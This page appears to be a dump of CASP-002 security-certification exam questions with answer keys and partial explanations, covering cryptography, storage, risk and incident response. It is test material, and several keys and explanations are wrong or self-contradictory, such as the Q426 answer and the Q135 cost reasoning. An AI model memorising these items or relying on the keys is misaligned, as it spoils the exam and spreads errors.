CASP-002_464 v4.2

Pataasin ang iyong marka sa homework at exams ngayon gamit ang Quizwiz!

QUESTION NO: 16 A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Knowing this, which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST important? A. Insecure direct object references, CSRF, Smurf B. Privilege escalation, Application DoS, Buffer overflow C. SQL injection, Resource exhaustion, Privilege escalation D. CSRF, Fault injection, Memory leaks

Answer: A Explanation: Insecure direct object references are used to access data. CSRF attacks the functions of a web site which could access data. A Smurf attack is used to take down a system. A direct object reference is likely to occur when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key without any validation mechanism which will allow attackers to manipulate these references to access unauthorized data. Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious Web site, email, blog, instant message, or program causes a user's Web browser to perform an unwanted action on a trusted site for which the user is currently authenticated. The impact of a successful cross-site request forgery attack is limited to the capabilities exposed by the vulnerable application. For example, this attack could result in a transfer of funds, changing a password, or purchasing an item in the user's context. In effect, CSRF attacks are used by an attacker to make a target system perform a function (funds Transfer, form submission etc.) via the target's browser without knowledge of the target user, at least until the unauthorized function has been committed. A smurf attack is a type of network security breach in which a network connected to the Internet is swamped with replies to ICMP echo (PING) requests. A smurf attacker sends PING requests to an Internet broadcast address. These are special addresses that broadcast all received messages to the hosts connected to the subnet. Each broadcast address can support up to 255 hosts, so a single PING request can be multiplied 255 times. The return address of the request itself is spoofed to be the address of the attacker's victim. All the hosts receiving the PING request reply to this victim's address instead of the real sender's address. A single attacker sending hundreds or thousands of these PING messages per second can fill the victim's T-1 (or even T-3) line with ping replies, bring the entire Internet service to its knees. Smurfing falls under the general category of Denial of Service attacks -- security attacks that don't try to steal information, but instead attempt to disable a computer or network.

QUESTION NO: 68 After a security incident, an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Which of the following would help meet these goals by having co-workers occasionally audit another worker's position? A. Least privilege B. Job rotation C. Mandatory vacation D. Separation of duties

Answer: B Explanation: Job rotation can reduce fraud or misuse by preventing an individual from having too much control over an area.

QUESTION NO: 26 Which of the following technologies prevents an unauthorized HBA from viewing iSCSI target information? A. Deduplication B. Data snapshots C. LUN masking D. Storage multipaths

Answer: C Explanation: A logical unit number (LUN) is a unique identifier that designates individual hard disk devices or grouped devices for address by a protocol associated with a SCSI, iSCSI, Fibre Channel (FC) or similar interface. LUNs are central to the management of block storage arrays shared over a storage area network (SAN). LUN masking subdivides access to a given port. Then, even if several LUNs are accessed through the same port, the server masks can be set to limit each server's access to the appropriate LUNs. LUN masking is typically conducted at the host bus adapter (HBA) or switch level.

QUESTION NO: 54 The Chief Information Security Officer (CISO) at a large organization has been reviewing some security-related incidents at the organization and comparing them to current industry trends. The desktop security engineer feels that the use of USB storage devices on office computers has contributed to the frequency of security incidents. The CISO knows the acceptable use policy prohibits the use of USB storage devices. Every user receives a popup warning about this policy upon login. The SIEM system produces a report of USB violations on a monthly basis; yet violations continue to occur. Which of the following preventative controls would MOST effectively mitigate the logical risks associated with the use of USB storage devices? A. Revise the corporate policy to include possible termination as a result of violations B. Increase the frequency and distribution of the USB violations report C. Deploy PKI to add non-repudiation to login sessions so offenders cannot deny the offense D. Implement group policy objects

Answer: D Explanation: A Group Policy Object (GPO) can apply a common group of settings to all computers in Windows domain. One GPO setting under the Removable Storage Access node is: All removable storage classes: Deny all access. This setting can be applied to all computers in the network and will disable all USB storage devices on the computers.

QUESTION NO: 67 An organization is selecting a SaaS provider to replace its legacy, in house Customer Resource Management (CRM) application. Which of the following ensures the organization mitigates the risk of managing separate user credentials? A. Ensure the SaaS provider supports dual factor authentication. B. Ensure the SaaS provider supports encrypted password transmission and storage. C. Ensure the SaaS provider supports secure hash file exchange. D. Ensure the SaaS provider supports role-based access control. E. Ensure the SaaS provider supports directory services federation.

Answer: E Explanation: A SaaS application that has a federation server within the customer's network that interfaces with the customer's own enterprise user-directory service can provide single sign-on authentication. This federation server has a trust relationship with a corresponding federation server located within the SaaS provider's network. Single sign-on will mitigate the risk of managing separate user credentials.

QUESTION NO: 79 A security officer is leading a lessons learned meeting. Which of the following should be components of that meeting? (Select TWO). A. Demonstration of IPS system B. Review vendor selection process C. Calculate the ALE for the event D. Discussion of event timeline E. Assigning of follow up items

Answer: D,E Explanation: Lessons learned process is the sixth step in the Incident Response process. Everybody that was involved in the process reviews what happened and why it happened. It is during this step that they determine what changes should be introduced to prevent future problems.

QUESTION NO: 322 Which of the following should be used to identify overflow vulnerabilities? A. Fuzzing B. Input validation C. Privilege escalation D. Secure coding standards

Answer: A Explanation:

QUESTION NO: 423 A security administrator was doing a packet capture and noticed a system communicating with an address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network. Which of the following is the BEST course of action? A. Investigate the network traffic and block UDP port 3544 at the firewall B. Remove the system from the network and disable IPv6 at the router C. Locate and remove the unauthorized 6to4 relay from the network D. Disable the switch port and block the 2001::/32 traffic at the firewall

Answer: A Explanation:

QUESTION NO: 426 Every year, the accounts payable employee, Ann, takes a week off work for a vacation. She typically completes her responsibilities remotely during this week. Which of the following policies, when implemented, would allow the company to audit this employee's work and potentially discover improprieties? A. Job rotation B. Mandatory vacations C. Least privilege D. Separation of duties

Answer: A Explanation:

QUESTION NO: 154 A security engineer is a new member to a configuration board at the request of management. The company has two new major IT projects starting this year and wants to plan security into the application deployment. The board is primarily concerned with the applications' compliance with federal assessment and authorization standards. The security engineer asks for a timeline to determine when a security assessment of both applications should occur and does not attend subsequent configuration board meetings. If the security engineer is only going to perform a security assessment, which of the following steps in system authorization has the security engineer omitted? A. Establish the security control baseline B. Build the application according to software development security standards C. Review the results of user acceptance testing D. Consult with the stakeholders to determine which standards can be omitted

Answer: A Explanation: A security baseline is the minimum level of security that a system, network, or device must adhere to. It is the initial point of reference for security and the document against which assessments would be done.

QUESTION NO: 153 A mature organization with legacy information systems has incorporated numerous new processes and dependencies to manage security as its networks and infrastructure are modernized. The Chief Information Office has become increasingly frustrated with frequent releases, stating that the organization needs everything to work completely, and the vendor should already have those desires built into the software product. The vendor has been in constant communication with personnel and groups within the organization to understand its business process and capture new software requirements from users. Which of the following methods of software development is this organization's configuration management process using? A. Agile B. SDL C. Waterfall D. Joint application development

Answer: A Explanation: In agile software development, teams of programmers and business experts work closely together, using an iterative approach.

QUESTION NO: 231 A security solutions architect has argued consistently to implement the most secure method of encrypting corporate messages. The solution has been derided as not being cost effective by other members of the IT department. The proposed solution uses symmetric keys to encrypt all messages and is very resistant to unauthorized decryption. The method also requires special handling and security for all key material that goes above and beyond most encryption systems. Which of the following is the solutions architect MOST likely trying to implement? A. One time pads B. PKI C. Quantum cryptography D. Digital rights management

Answer: A Explanation: In cryptography, the one-time pad (OTP) is an encryption technique that cannot be cracked if used correctly. In this technique, a plaintext is paired with a random secret key (also referred to as a one-time pad). Then, each bit or character of the plaintext is encrypted by combining it with the corresponding bit or character from the pad using modular addition. If the key is truly random, is at least as long as the plaintext, is never reused in whole or in part, and is kept completely secret, then the resulting ciphertext will be impossible to decrypt or break. However, practical problems have prevented one-time pads from being widely used. The "pad" part of the name comes from early implementations where the key material was distributed as a pad of paper, so that the top sheet could be easily torn off and destroyed after use. The one-time pad has serious drawbacks in practice because it requires: Because the pad, like all shared secrets, must be passed and kept secure, and the pad has to be at least as long as the message, there is often no point in using one-time padding, as one can simply send the plain text instead of the pad (as both can be the same size and have to be sent securely). Distributing very long one-time pad keys is inconvenient and usually poses a significant security risk. The pad is essentially the encryption key, but unlike keys for modern ciphers, it must be extremely long and is much too difficult for humans to remember. Storage media such as thumb drives, DVD-Rs or personal digital audio players can be used to carry a very large one-time-pad from place to place in a non-suspicious way, but even so the need to transport the pad physically is a burden compared to the key negotiation protocols of a modern public-key cryptosystem, and such media cannot reliably be erased securely by any means short of physical destruction (e.g., incineration). The key material must be securely disposed of after use, to ensure the key material is never reused and to protect the messages sent. Because the key material must be transported from one endpoint to another, and persist until the message is sent or received, it can be more vulnerable to forensic recovery than the transient plaintext it protects.

QUESTION NO: 325 Due to cost and implementation time pressures, a security architect has allowed a NAS to be used instead of a SAN for a non-critical, low volume database. Which of the following would make a NAS unsuitable for a business critical, high volume database application that required a high degree of data confidentiality and data availability? (Select THREE). A. File level transfer of data B. Zoning and LUN security C. Block level transfer of data D. Multipath E. Broadcast storms F. File level encryption G. Latency

Answer: A,E,G Explanation:

QUESTION NO: 220 Two universities are making their 802.11n wireless networks available to the other university's students. The infrastructure will pass the student's credentials back to the home school for authentication via the Internet. The requirements are: Mutual authentication of clients and authentication server The design should not limit connection speeds Authentication must be delegated to the home school No passwords should be sent unencrypted The following design was implemented: WPA2 Enterprise using EAP-PEAP-MSCHAPv2 will be used for wireless security RADIUS proxy servers will be used to forward authentication requests to the home school The RADIUS servers will have certificates from a common public certificate authority A strong shared secret will be used for RADIUS server authentication Which of the following security considerations should be added to the design? A. The transport layer between the RADIUS servers should be secured B. WPA Enterprise should be used to decrease the network overhead C. The RADIUS servers should have local accounts for the visiting students D. Students should be given certificates to use for authentication to the network

Answer: A Explanation: One of the requirements in this question states, "No passwords should be sent unencrypted". The design that was implemented makes no provision for the encryption of passwords as they are sent between RADIUS servers. The local RADIUS servers will pass the student's credentials back to the home school RADIUS servers for authentication via the Internet. When passing sensitive data such as usernames and passwords over the internet, the data should be sent over a secure connection. We can secure the transport layer between the RADIUS servers by implementing TLS (Transport Layer Security). Transport Layer Security (TLS) is a protocol that ensures privacy between communicating applications and their users on the Internet. When a server and client communicate, TLS ensures that no third party may eavesdrop or tamper with any message. TLS is the successor to the Secure Sockets Layer (SSL).

QUESTION NO: 145 A security manager is looking into the following vendor proposal for a cloud-based SIEM solution. The intention is that the cost of the SIEM solution will be justified by having reduced the number of incidents and therefore saving on the amount spent investigating incidents. Proposal: External cloud-based software as a service subscription costing $5,000 per month. Expected to reduce the number of current incidents per annum by 50%. The company currently has ten security incidents per annum at an average cost of $10,000 per incident. Which of the following is the ROI for this proposal after three years? A. -$30,000 B. $120,000 C. $150,000 D. $180,000

Answer: A Explanation: Return on investment = Net profit / Investment where:Net profit = gross profit expenses. or Return on investment = (gain from investment - cost of investment) / cost of investment Subscriptions = 5,000 x 12 = 60,000 per annum 10 incidents @ 10,000 = 100.000 per annumreduce by 50% = 50,000 per annum Thus the rate of Return is -10,000 per annum and that makes for -$30,000 after three years. References: http://www.financeformulas.net/Return_on_Investment.html

QUESTION NO: 255 The security manager of a company has hired an external consultant to conduct a security assessment of the company network. The contract stipulates that the consultant is not allowed to transmit any data on the company network while performing wired and wireless security assessments. Which of the following technical means can the consultant use to determine the manufacturer and likely operating system of the company wireless and wired network devices, as well as the computers connected to the company network? A. Social engineering B. Protocol analyzer C. Port scanner D. Grey box testing

Answer: B Explanation:

QUESTION NO: 135 A Chief Information Security Officer (CISO) has requested that a SIEM solution be implemented. The CISO wants to know upfront what the projected TCO would be before looking further into this concern. Two vendor proposals have been received: Vendor A: product-based solution which can be purchased by the pharmaceutical company.Capital expenses to cover central log collectors, correlators, storage and management consoles expected to be $150,000. Operational expenses are expected to be a 0.5 full time employee (FTE) to manage the solution, and 1 full time employee to respond to incidents per year. Vendor B: managed service-based solution which can be the outsourcer for the pharmaceutical company's needs.Bundled offering expected to be $100,000 per year. Operational expenses for the pharmaceutical company to partner with the vendor are expected to be a 0.5 FTE per year. Internal employee costs are averaged to be $80,000 per year per FTE. Based on calculating TCO of the two vendor proposals over a 5 year period, which of the following options is MOST accurate? A. Based on cost alone, having an outsourced solution appears cheaper. B. Based on cost alone, having an outsourced solution appears to be more expensive. C. Based on cost alone, both outsourced an in-sourced solutions appear to be the same. D. Based on cost alone, having a purchased product solution appears cheaper.

Answer: A Explanation: The costs of making use of an outsources solution will actually be a savings for the company thus the outsourced solution is a cheaper option over a 5 year period because it amounts to 0,5 FTE per year for the company and at present the company expense if $80,000 per year per FTE. For the company to go alone it will cost $80,000 per annum per FTE = $400,000 over 5 years. With Vendor a $150,000 + $200,000 (½ FTE) = $350,000 With Vendor B = $100,000 it will be more expensive. References: Gregg, Michael, and Billy Haines, CASP CompTIA Advanced Security Practitioner Study Guide, John Wiley & Sons, Indianapolis, 2012, p. 130

QUESTION NO: 146 An administrator believes that the web servers are being flooded with excessive traffic from time to time. The administrator suspects that these traffic floods correspond to when a competitor makes major announcements. Which of the following should the administrator do to prove this theory? A. Implement data analytics to try and correlate the occurrence times. B. Implement a honey pot to capture traffic during the next attack. C. Configure the servers for high availability to handle the additional bandwidth. D. Log all traffic coming from the competitor's public IP addresses.

Answer: A Explanation: There is a time aspect to the traffic flood and if you correlate the data analytics with the times that the incidents happened, you will be able to prove the theory.

QUESTION NO: 411 A sensitive database needs its cryptographic integrity upheld. Which of the following controls meets this goal? (Select TWO). A. Data signing B. Encryption C. Perfect forward secrecy D. Steganography E. Data vaulting F. RBAC G. Lock and key

Answer: A,F Explanation:

QUESTION NO: 433 Company XYZ is building a new customer facing website which must access some corporate resources. The company already has an internal facing web server and a separate server supporting an extranet to which suppliers have access. The extranet web server is located in a network DMZ. The internal website is hosted on a laptop on the internal corporate network. The internal network does not restrict traffic between any internal hosts. Which of the following locations will BEST secure both the intranet and the customer facing website? A. The existing internal network segment B. Dedicated DMZ network segments C. The existing extranet network segment D. A third-party web hosting company

Answer: B Explanation:

QUESTION NO: 184 An employee is performing a review of the organization's security functions and noticed that there is some cross over responsibility between the IT security team and the financial fraud team. Which of the following security documents should be used to clarify the roles and responsibilities between the teams? A. BPA B. BIA C. MOU D. OLA

Answer: C Explanation: A memorandum of understanding (MOU) documents conditions and applied terms for teams that must share data and information resources.

QUESTION NO: 413 During a software development project review, the cryptographic engineer advises the project manager that security can be greatly improved by significantly slowing down the runtime of a hashing algorithm and increasing the entropy by passing the input and salt back during each iteration. Which of the following BEST describes what the engineer is trying to achieve? A. Monoalphabetic cipher B. Confusion C. Root of trust D. Key stretching E. Diffusion

Answer: D Explanation:

QUESTION NO: 328 Which of the following is the BEST place to contractually document security priorities, responsibilities, guarantees, and warranties when dealing with outsourcing providers? A. NDA B. OLA C. MOU D. SLA

Answer: D Explanation:

QUESTION NO: 105 The DLP solution has been showing some unidentified encrypted data being sent using FTP to a remote server. A vulnerability scan found a collection of Linux servers that are missing OS level patches. Upon further investigation, a technician notices that there are a few unidentified processes running on a number of the servers. What would be a key FIRST step for the data security team to undertake at this point? A. Capture process ID data and submit to anti-virus vendor for review. B. Reboot the Linux servers, check running processes, and install needed patches. C. Remove a single Linux server from production and place in quarantine. D. Notify upper management of a security breach. E. Conduct a bit level image, including RAM, of one or more of the Linux servers.

Answer: E Explanation: Incident management (IM) is a necessary part of a security program. When effective, it mitigates business impact, identifies weaknesses in controls, and helps fine-tune response processes. In this question, an attack has been identified and confirmed. When a server is compromised or used to commit a crime, it is often necessary to seize it for forensics analysis. Security teams often face two challenges when trying to remove a physical server from service: retention of potential evidence in volatile storage or removal of a device from a critical business process. Evidence retention is a problem when the investigator wants to retain RAM content. For example, removing power from a server starts the process of mitigating business impact, but it also denies forensic analysis of data, processes, keys, and possible footprints left by an attacker. A full a bit level image, including RAM should be taken of one or more of the Linux servers. In many cases, if your environment has been deliberately attacked, you may want to take legal action against the perpetrators. In order to preserve this option, you should gather evidence that can be used against them, even if a decision is ultimately made not to pursue such action. It is extremely important to back up the compromised systems as soon as possible. Back up the systems prior to performing any actions that could affect data integrity on the original media.

QUESTION NO: 49 Using SSL, an administrator wishes to secure public facing server farms in three subdomains: dc1.east.company.com, dc2.central.company.com, and dc3.west.company.com. Which of the following is the number of wildcard SSL certificates that should be purchased? A. 0 B. 1 C. 3 D. 6

Answer: C Explanation: You would need three wildcard certificates: The common domain in each of the domains is company.com. However, a wildcard covers only one level of subdomain. For example: *. company.com will cover "<anything>.company.com" but it won't cover "<anything>.<anything>.company.com". You can only have one wildcard in a domain. For example: *.company.com. You cannot have *.*.company.com. Only the leftmost wildcard (*) is counted.

QUESTION NO: 5 A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition and logical volume. Which of the following is the BEST way to ensure confidentiality of individual operating system data? A. Encryption of each individual partition B. Encryption of the SSD at the file level C. FDE of each logical volume on the SSD D. FDE of the entire SSD as a single disk

Answer: A Explanation: In this question, we have multiple operating system installations on a single disk. Some operating systems store their boot loader in the MBR of the disk. However, some operating systems install their boot loader outside the MBR especially when multiple operating systems are installed. We need to encrypt as much data as possible but we cannot encrypt the boot loaders. This would prevent the operating systems from loading. Therefore, the solution is to encrypt each individual partition separately.

QUESTION NO: 44 A storage as a service company implements both encryption at rest as well as encryption in transit of customers' data. The security administrator is concerned with the overall security of the encrypted customer data stored by the company servers and wants the development team to implement a solution that will strengthen the customer's encryption key. Which of the following, if implemented, will MOST increase the time an offline password attack against the customers' data would take? A. key = NULL ; for (int i=0; i<5000; i++) { key = sha(key + password) } B. password = NULL ; for (int i=0; i<10000; i++) { password = sha256(key) } C. password = password + sha(password+salt) + aes256(password+salt) D. key = aes128(sha256(password), password))

Answer: A Explanation: References: http://stackoverflow.com/questions/4948322/fundamental-difference-between-hashing-and- encryption-algorithms

QUESTION NO: 24 Which of the following describes a risk and mitigation associated with cloud data storage? A. Risk: Shared hardware caused data leakage Mitigation: Strong encryption at rest B. Risk: Offsite replication Mitigation: Multi-site backups C. Risk: Data loss from de-duplication Mitigation: Dynamic host bus addressing D. Risk: Combined data archiving Mitigation: Two-factor administrator authentication

Answer: A Explanation: With cloud data storage, the storage provider will have large enterprise SANs providing large pools of storage capacity. Portions of the storage pools are assigned to customers. The risk is that multiple customers are storing their data on the same physical hardware storage devices. This presents a risk (usually a very small risk, but a risk all the same) of other customers using the same cloud storage hardware being able to view your data. The mitigation of the risk is to encrypt your data stored on the SAN. Then the data would be unreadable even if another customer was able to access it.

QUESTION NO: 196 Customers have recently reported incomplete purchase history and other anomalies while accessing their account history on the web server farm. Upon investigation, it has been determined that there are version mismatches of key e-commerce applications on the production web servers. The development team has direct access to the production servers and is most likely the cause of the different release versions. Which of the following process level solutions would address this problem? A. Implement change control practices at the organization level. B. Adjust the firewall ACL to prohibit development from directly accessing the production server farm. C. Update the vulnerability management plan to address data discrepancy issues. D. Change development methodology from strict waterfall to agile.

Answer: A Explanation: Change control and change management defines policies and practices to manage changes made to a system. It ensures that changes to a system occur in an orderly process.

QUESTION NO: 308 Customer Need: "We need the system to produce a series of numbers with no discernible mathematical progression for use by our Java based, PKI-enabled, customer facing website." Which of the following BEST restates the customer need? A. The system shall use a pseudo-random number generator seeded the same every time. B. The system shall generate a pseudo-random number upon invocation by the existing Java program. C. The system shall generate a truly random number based upon user PKI certificates. D. The system shall implement a pseudo-random number generator for use by corporate customers.

Answer: B Explanation:

QUESTION NO: 410 A system administrator is troubleshooting a possible denial of service on a sensitive system. The system seems to run properly for a few hours after it is restarted, but then it suddenly stops processing transactions. The system administrator suspects an internal DoS caused by a disgruntled developer who is currently seeking a new job while still working for the company. After looking into various system logs, the system administrator looks at the following output from the main system service responsible for processing incoming transactions. DATE/TIMEPIDCOMMAND%CPUMEM 031020141030002055com.proc10.2920K 031020141100002055com.proc12.35.2M 031020141230002055com.proc22.022M 031020141300002055com.proc33.01.6G 031020141330002055com.proc30.28.0G Which of the following is the MOST likely cause for the DoS? A. The system does not implement proper garbage collection. B. The system is susceptible to integer overflow. C. The system does not implement input validation. D. The system does not protect against buffer overflows properly.

Answer: A Explanation:

QUESTION NO: 157 A small retail company recently deployed a new point of sale (POS) system to all 67 stores. The core of the POS is an extranet site, accessible only from retail stores and the corporate office over a split-tunnel VPN. An additional split-tunnel VPN provides bi-directional connectivity back to the main office, which provides voice connectivity for store VoIP phones. Each store offers guest wireless functionality, as well as employee wireless. Only the staff wireless network has access to the POS VPN. Recently, stores are reporting poor response times when accessing the POS application from store computers as well as degraded voice quality when making phone calls. Upon investigation, it is determined that three store PCs are hosting malware, which is generating excessive network traffic. After malware removal, the information security department is asked to review the configuration and suggest changes to prevent this from happening again. Which of the following denotes the BEST way to mitigate future malware risk? A. Deploy new perimeter firewalls at all stores with UTM functionality. B. Change antivirus vendors at the store and the corporate office. C. Move to a VDI solution that runs offsite from the same data center that hosts the new POS solution. D. Deploy a proxy server with content filtering at the corporate office and route all traffic through it.

Answer: A Explanation: A perimeter firewall is located between the local network and the Internet where it can screen network traffic flowing in and out of the organization. A firewall with unified threat management (UTM) functionalities includes anti-malware capabilities.

QUESTION NO: 127 A security consultant is conducting a network assessment and wishes to discover any legacy backup Internet connections the network may have. Where would the consultant find this information and why would it be valuable? A. This information can be found in global routing tables, and is valuable because backup connections typically do not have perimeter protection as strong as the primary connection. B. This information can be found by calling the regional Internet registry, and is valuable because backup connections typically do not require VPN access to the network. C. This information can be found by accessing telecom billing records, and is valuable because backup connections typically have much lower latency than primary connections. D. This information can be found by querying the network's DNS servers, and is valuable because backup DNS servers typically allow recursive queries from Internet hosts.

Answer: A Explanation: A routing table is a set of rules, often viewed in table format that is used to determine where data packets traveling over an Internet Protocol (IP) network will be directed. All IP-enabled devices, including routers and switches, use routing tables. Each packet contains information about its origin and destination. When a packet is received, a network device examines the packet and matches it to the routing table entry providing the best match for its destination. The table then provides the device with instructions for sending the packet to the next hop on its route across the network. Thus the security consultant can use the global routing table to get the appropriate information.

QUESTION NO: 175 A business unit of a large enterprise has outsourced the hosting and development of a new external website which will be accessed by premium customers, in order to speed up the time to market timeline. Which of the following is the MOST appropriate? A. The external party providing the hosting and website development should be obligated under contract to provide a secure service which is regularly tested (vulnerability and penetration). SLAs should be in place for the resolution of newly identified vulnerabilities and a guaranteed uptime. B. The use of external organizations to provide hosting and web development services is not recommended as the costs are typically higher than what can be achieved internally. In addition, compliance with privacy regulations becomes more complex and guaranteed uptimes are difficult to track and measure. C. Outsourcing transfers all the risk to the third party. An SLA should be in place for the resolution of newly identified vulnerabilities and penetration / vulnerability testing should be conducted regularly. D. Outsourcing transfers the risk to the third party, thereby minimizing the cost and any legal obligations. An MOU should be in place for the resolution of newly identified vulnerabilities and penetration / vulnerability testing should be conducted regularly.

Answer: A Explanation: A service level agreement (SLA) guarantees the level of service the partner is agreeing to provide. It specifies the uptime, response time, and maximum outage time that the partner is agreeing to.

QUESTION NO: 228 An administrator is implementing a new network-based storage device. In selecting a storage protocol, the administrator would like the data in transit's integrity to be the most important concern. Which of the following protocols meets these needs by implementing either AES-CMAC or HMAC-SHA256 to sign data? A. SMB B. NFS C. FCoE D. iSCSI

Answer: A Explanation: Server Message Block (SMB) is a protocol that has long been used by Windows computers for sharing files, printers and other resources among computers on the network. The server message blocks are the requests that an SMB client sends to a server and the responses that the server sends back to the client. Microsoft has improved the SMB protocol over the years. In 2006, they came out with a new version, SMB 2.0, in conjunction with Vista, and SMB 2.1 with Windows 7. Version 2 was a major revision with significant changes, including a completely different packet format. Windows 8 introduces another new version, SMB 3.0. Microsoft has made a number of security improvements in SMB 3.0, which will be introduced in the Windows 8 client and Windows Server 2012. A new algorithm is used for SMB signing. SMB 2.x uses HMAC-SHA256. SMB 3.0 uses AES-CMAC. CMAC is based on a symmetric key block cipher (AES), whereas HMAC is based on a hash function (SHA). AES (Advanced Encryption Standard) is the specification adopted by the U.S. government in 2002 and was approved by the National Security Agency (NSA) for encryption of top secret information.

QUESTION NO: 195 A company has a difficult time communicating between the security engineers, application developers, and sales staff. The sales staff tends to overpromise the application deliverables. The security engineers and application developers are falling behind schedule. Which of the following should be done to solve this? A. Allow the sales staff to shadow the developers and engineers to see how their sales impact the deliverables. B. Allow the security engineering team to do application development so they understand why it takes so long. C. Allow the application developers to attend a sales conference so they understand how business is done. D. Allow the sales staff to learn application programming and security engineering so they understand the whole lifecycle.

Answer: A Explanation: This is a common problem in business. Sales staff just wants to sell, sell, sell as they are usually paid on a commission basis. Sales users rarely understand exactly what is involved in developing a product for them to sell or the time it takes so it's easy for them to make promises that are difficult to deliver. If the sales staff had a better understanding of the processes involved in developing a product, then they might think more about whether what they are promising is deliverable. By allowing the sales staff to shadow the developers and engineers, the sales staff would gain a better understanding of the time it takes to develop a product.

QUESTION NO: 201 Company A needs to export sensitive data from its financial system to company B's database, using company B's API in an automated manner. Company A's policy prohibits the use of any intermediary external systems to transfer or store its sensitive data, therefore the transfer must occur directly between company A's financial system and company B's destination server using the supplied API. Additionally, company A's legacy financial software does not support encryption, while company B's API supports encryption. Which of the following will provide end-to-end encryption for the data transfer while adhering to these requirements? A. Company A must install an SSL tunneling software on the financial system. B. Company A's security administrator should use an HTTPS capable browser to transfer the data. C. Company A should use a dedicated MPLS circuit to transfer the sensitive data to company B. D. Company A and B must create a site-to-site IPSec VPN on their respective firewalls.

Answer: A Explanation: We need to transfer the data from company A's financial system to company B's destination server. Company B's API does support encryption. Company A's legacy financial software does not support encryption. To provide end-to-end encryption for the data transfer, we need a way of enabling Company A's financial system to support encryption. The easiest way to do this is to install an SSL tunneling software application on the financial system. There are several SSL tunneling software applications out there; one example is STunnel.

QUESTION NO: 250 A database administrator comes across the below records in one of the databases during an internal audit of the payment system: UserIDAddressCredit Card No.Password jsmith123 fake street55XX-XXX-XXXX-1397Password100 jqdoe234 fake street42XX-XXX-XXXX-202717DEC12 From a security perspective, which of the following should be the administrator's GREATEST concern, and what will correct the concern? A. Concern: Passwords are stored in plain text. Correction: Require a minimum of 8 alphanumeric characters and hash the password. B. Concern: User IDs are also usernames, and could be enumerated, thereby disclosing sensitive account information. Correction: Require user IDs to be more complex by using alphanumeric characters and hash the UserIDs. C. Concern: User IDs are confidential private information. Correction: Require encryption of user IDs. D. Concern: More than four digits within a credit card number are stored. Correction: Only store the last four digits of a credit card to protect sensitive financial information.

Answer: A Explanation:

QUESTION NO: 253 A small company hosting multiple virtualized client servers on a single host is considering adding a new host to create a cluster. The new host hardware and operating system will be different from the first host, but the underlying virtualization technology will be compatible. Both hosts will be connected to a shared iSCSI storage solution. Which of the following is the hosting company MOST likely trying to achieve? A. Increased customer data availability B. Increased customer data confidentiality C. Increased security through provisioning D. Increased security through data integrity

Answer: A Explanation:

QUESTION NO: 263 Within the company, there is executive management pressure to start advertising to a new target market. Due to the perceived schedule and budget inefficiencies of engaging a technology business unit to commission a new micro-site, the marketing department is engaging third parties to develop the site in order to meet time-to-market demands. From a security perspective, which of the following options BEST balances the needs between marketing and risk management? A. The third party should be contractually obliged to perform adequate security activities, and evidence of those activities should be confirmed by the company prior to launch. B. Outsourcing is a valid option to increase time-to-market. If a security incident occurs, it is not of great concern as the reputational damage will be the third party's responsibility. C. The company should never outsource any part of the business that could cause a security or privacy incident. It could lead to legal and compliance issues. D. If the third party has an acceptable record to date on security compliance and is provably faster and cheaper, then it makes sense to outsource in this specific situation.

Answer: A Explanation:

QUESTION NO: 274 A new startup company with very limited funds wants to protect the organization from external threats by implementing some type of best practice security controls across a number of hosts located in the application zone, the production zone, and the core network. The 50 hosts in the core network are a mixture of Windows and Linux based systems, used by development staff to develop new applications. The single Windows host in the application zone is used exclusively by the production team to control software deployments into the production zone. There are 10 UNIX web application hosts in the production zone which are publically accessible. Development staff is required to install and remove various types of software from their hosts on a regular basis while the hosts in the zone rarely require any type of configuration changes. Which of the following when implemented would provide the BEST level of protection with the LEAST amount of disruption to staff? A. NIPS in the production zone, HIPS in the application zone, and anti-virus / anti-malware across all Windows hosts. B. NIPS in the production zone, NIDS in the application zone, HIPS in the core network, and antivirus / anti-malware across all hosts. C. HIPS in the production zone, NIPS in the application zone, and HIPS in the core network. D. NIDS in the production zone, HIDS in the application zone, and anti-virus / anti-malware across all hosts.

Answer: A Explanation:

QUESTION NO: 284 A manager who was attending an all-day training session was overdue entering bonus and payroll information for subordinates. The manager felt the best way to get the changes entered while in training was to log into the payroll system, and then activate desktop sharing with a trusted subordinate. The manager granted the subordinate control of the desktop thereby giving the subordinate full access to the payroll system. The subordinate did not have authorization to be in the payroll system. Another employee reported the incident to the security team. Which of the following would be the MOST appropriate method for dealing with this issue going forward? A. Provide targeted security awareness training and impose termination for repeat violators. B. Block desktop sharing and web conferencing applications and enable use only with approval. C. Actively monitor the data traffic for each employee using desktop sharing or web conferencing applications. D. Permanently block desktop sharing and web conferencing applications and do not allow its use at the company.

Answer: A Explanation:

QUESTION NO: 286 A morphed worm carrying a 0-day payload has infiltrated the company network and is now spreading across the organization. The security administrator was able to isolate the worm communication and payload distribution channel to TCP port 445. Which of the following can the administrator do in the short term to minimize the attack? A. Deploy the following ACL to the HIPS: DENY - TCP - ANY - ANY - 445. B. Run a TCP 445 port scan across the organization and patch hosts with open ports. C. Add the following ACL to the corporate firewall: DENY - TCP - ANY - ANY - 445. D. Force a signature update and full system scan from the enterprise anti-virus solution.

Answer: A Explanation:

QUESTION NO: 294 A financial company implements end-to-end encryption via SSL in the DMZ, and only IPSec in transport mode with AH enabled and ESP disabled throughout the internal network. The company has hired a security consultant to analyze the network infrastructure and provide a solution for intrusion prevention. Which of the following recommendations should the consultant provide to the security administrator? A. Switch to TLS in the DMZ. Implement NIPS on the internal network, and HIPS on the DMZ. B. Switch IPSec to tunnel mode. Implement HIPS on the internal network, and NIPS on the DMZ. C. Disable AH. Enable ESP on the internal network, and use NIPS on both networks. D. Enable ESP on the internal network, and place NIPS on both networks.

Answer: A Explanation:

QUESTION NO: 307 A security researcher is about to evaluate a new secure VoIP routing appliance. The appliance manufacturer claims the new device is hardened against all known attacks and several undisclosed zero day exploits. The code base used for the device is a combination of compiled C and TC/TKL scripts. Which of the following methods should the security research use to enumerate the ports and protocols in use by the appliance? A. Device fingerprinting B. Switchport analyzer C. Grey box testing D. Penetration testing

Answer: A Explanation:

